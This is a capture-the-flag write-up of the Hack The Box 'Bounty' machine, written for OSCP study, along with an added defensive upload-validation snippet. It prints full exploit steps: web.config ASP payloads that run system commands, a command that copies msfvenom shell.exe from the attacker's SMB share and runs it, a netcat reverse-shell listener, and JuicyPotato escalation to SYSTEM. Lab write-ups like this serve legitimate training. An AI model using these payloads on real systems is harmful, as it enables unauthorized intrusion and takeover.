Hack The Box: Bounty Write-up (#38)

Joshua Surendran
9 min read · Nov 17, 2020

This is my 38th box out of 45 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator 10.10.10.93 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

Running all scans on 10.10.10.93
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:39 +08
Warning: 10.10.10.93 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.93
Host is up (0.0088s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up (0.0087s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:40 +08
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.45 seconds
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:43 +08
Initiating Parallel DNS resolution of 1 host. at 07:43
Completed Parallel DNS resolution of 1 host. at 07:43, 0.20s elapsed
Initiating SYN Stealth Scan at 07:43
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.44% done; ETC: 07:48 (0:04:00 remaining)
SYN Stealth Scan Timing: About 22.86% done; ETC: 07:47 (0:03:26 remaining)
SYN Stealth Scan Timing: About 34.29% done; ETC: 07:47 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.72% done; ETC: 07:47 (0:02:24 remaining)
SYN Stealth Scan Timing: About 57.14% done; ETC: 07:47 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.57% done; ETC: 07:47 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.00% done; ETC: 07:47 (0:00:53 remaining)
Completed SYN Stealth Scan at 07:47, 262.71s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.0076s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.98 seconds
Raw packets sent: 131275 (5.776MB) | Rcvd: 207 (9.108KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:47 +08
Nmap scan report for 10.10.10.93
Host is up (0.0069s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 07:48 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.93
Host is up (0.0083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.27 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (21) s: All
---------------------Running Recon Commands----------------------
Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.93:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 07:51:15 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/09/12 07:51:33 Finished
===============================================================
Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-09-12 07:51:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 07:52:51 (GMT8) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------

Only port 80 is open.

  • Port 80: running Microsoft IIS httpd 7.5.

Before we begin, let’s make mental notes based on the scan results.

  1. The only open port is port 80, so this will surely be our entry point to the target. A quick Google search for IIS 7.5 suggests it is probably running on Windows Server 2008 R2. Next, the gobuster scan returned 2 interesting paths, /transfer.aspx and /uploadedfiles, that are available on the web server. We’ll do manual enumeration to dig further.

Service Enumeration

Port 80 (HTTP)

Let’s visit the index page.

Just an image, nothing else. Check the page source for any sensitive information.

Nope, nothing interesting as well. Let’s visit the /transfer.aspx path.

We have file upload functionality. We’re not sure what file type or extension it will accept. We try to upload a PNG image file.

We get a “File uploaded successfully” message. We can view the uploaded file by visiting /uploadedfiles directory from the browser.

Great! In the same way, if we are able to upload a file containing ASPX or ASP code, we can get code execution. I tested these 2 file extensions and both returned the “Invalid File. Please try again” error message.

However, it does accept the CONFIG file extension. Since this web application runs on ASP/ASPX, we can upload a web.config file. web.config is an XML-based configuration file used by ASP.NET applications to manage the various settings that govern the website’s configuration. A quick Google search for “web.config upload rce” returned this link, which explains how you can get remote code execution by appending ASPX code to a web.config file.
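From a defender’s view, the weak point is the upload filter: it blocks .asp and .aspx by denylist, so a file type IIS also treats as configuration (.config) slips through into a served directory. The following is an added example, not code from the original post or from the box, of an allowlist check for an image-only upload like /transfer.aspx, with the denylist behaviour beside it for comparison; the extension set, reserved names and magic bytes are assumptions for the example.

```python
import os
import re

# Constructed policy for an image-only upload endpoint (assumption).
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Names IIS/ASP.NET interprets as configuration or code if they land in a served folder.
RESERVED_NAMES = {"web.config", "global.asax", "machine.config"}
# Leading bytes each allowed type must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def denylist_check(filename: str) -> bool:
    """The weak check the box's app effectively performs: only .asp/.aspx are refused,
    so 'web.config' is accepted."""
    return not filename.lower().endswith((".asp", ".aspx"))


def allowlist_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Hardened check: plain file name, no reserved server names, exactly one
    allowlisted extension, and content that matches the declared type."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base != filename:
        return False, "path separators not allowed"
    if base.lower() in RESERVED_NAMES:
        return False, "reserved server file name"
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext or '(none)'} not allowed"
    # Stem must be plain alphanumeric, which also rules out a second extension.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False, "file name stem must be alphanumeric"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    return True, "ok"
```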

So let’s test it out. Copy the code from the link above and save it as web.config. A little modification is needed: add ‘cmd /c’ just before the whoami command so the target interprets the command properly.

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

Upload the file and visit it from /uploadedfiles directory.

Great! It executed the system command and we get the user “bounty\merlin”. Before we move to a reverse shell, let’s run the systeminfo command to get OS details, which will help us upload and execute exploits for the correct OS architecture in a later phase.

Replace the whoami command with systeminfo.

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

Upload the file again and visit the /uploadedfiles directory.

As per our mental notes, this target’s OS is Windows Server 2008 R2 and the architecture is x64. One more thing: no patches (hotfixes) are installed, meaning it likely has multiple vulnerabilities to exploit. Time to get a shell!

Exploitation

Generate a reverse shell payload.

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe

Next, replace the ASPX code in the web.config file with the code below.

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c copy \\10.10.14.31\tools\shell.exe C:\Users\Public\shell.exe && cmd /c C:\Users\Public\shell.exe")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

We are telling the code to copy shell.exe from our SMB share and save it to the C:\Users\Public directory on the target machine. Once the copy finishes, it executes shell.exe.

Now, set up a simple SMB share in the same directory where your web.config and shell.exe reside.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

Set up a Netcat listener in your Kali Linux.

nc -nlvp 53

Upload the web.config file, then visit the /uploadedfiles directory. Go back to the listener and see if we have received a shell.

We get a shell! Grab the user flag.

Post-Exploitation Enumeration

Let’s check the privilege of the user with the following command.

whoami /priv

We get back the following results.

Merlin has SeImpersonatePrivilege enabled. This is good. We can use the token impersonation technique to escalate privileges to SYSTEM using an automated tool called JuicyPotato.

Privilege Escalation

Download the JuicyPotato.exe x64 binary from here and place it in your SMB share. Always practice placing your recon files in your current working directory to make things easy.

Transfer the JuicyPotato.exe binary to the target machine and place it in the same location as shell.exe.

copy \\10.10.14.31\tools\JuicyPotato.exe C:\Users\Public\JuicyPotato.exe

File copied.

Get your CLSID for Windows Server 2008 R2 from here.

Next, set up another Netcat listener in your Kali Linux.

nc -nlvp 53

Then run the following command from the target machine.

JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

Go back to the listener.

We’re SYSTEM! Grab the root flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Jerry.


Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.